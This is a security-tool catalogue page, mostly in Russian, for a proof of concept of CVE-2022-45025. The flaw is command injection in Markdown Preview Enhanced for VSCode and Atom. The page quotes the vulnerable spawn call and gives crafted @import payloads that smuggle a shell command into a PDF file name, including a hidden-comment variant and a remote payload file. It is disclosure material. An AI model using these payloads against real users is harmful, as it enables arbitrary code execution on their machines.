Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-45025 — [PoC] Внедрение команд через импорт PDF в Markdown Preview Enhanced (VSCode, Atom) | Kitploit
Инструменты/GitHubGitHub/yuriisanin/cve-2022-45025
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Внедрение команд через импорт PDF в Markdown Preview Enhanced (VSCode, Atom)

Репозиторий
88173 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-45025

Внедрение команд через импорт PDF в Markdown Preview Enhanced (VSCode, Atom)

Описание

Библиотека инструментов Markdown Mume была уязвима к внедрению команд из-за использования команды spawn с опцией {shell: true}. Это могло позволить злоумышленнику выполнить произвольный код, обманом заставив жертву открыть специально созданный Markdown-файл с помощью VSCode или Atom. Эта библиотека работает в плагине Markdown Preview Enhanced как для VSCode, так и для Atom.

Уязвимый фрагмент кода:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

Доказательство концепции

Следующий Markdown-документ позволяет злоумышленнику выполнить произвольную команду:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

The following comment will be recognised by MPE as valid "@import" command:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

Кроме того, полезная нагрузка может быть выполнена из внешнего источника:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

ДЕМО для VSCode и Atom на YouTube.

vscode-rce-poc-gif

Поддержка

Вы можете подписаться на меня в Twitter, GitHub или YouTube.

Скачать инструмент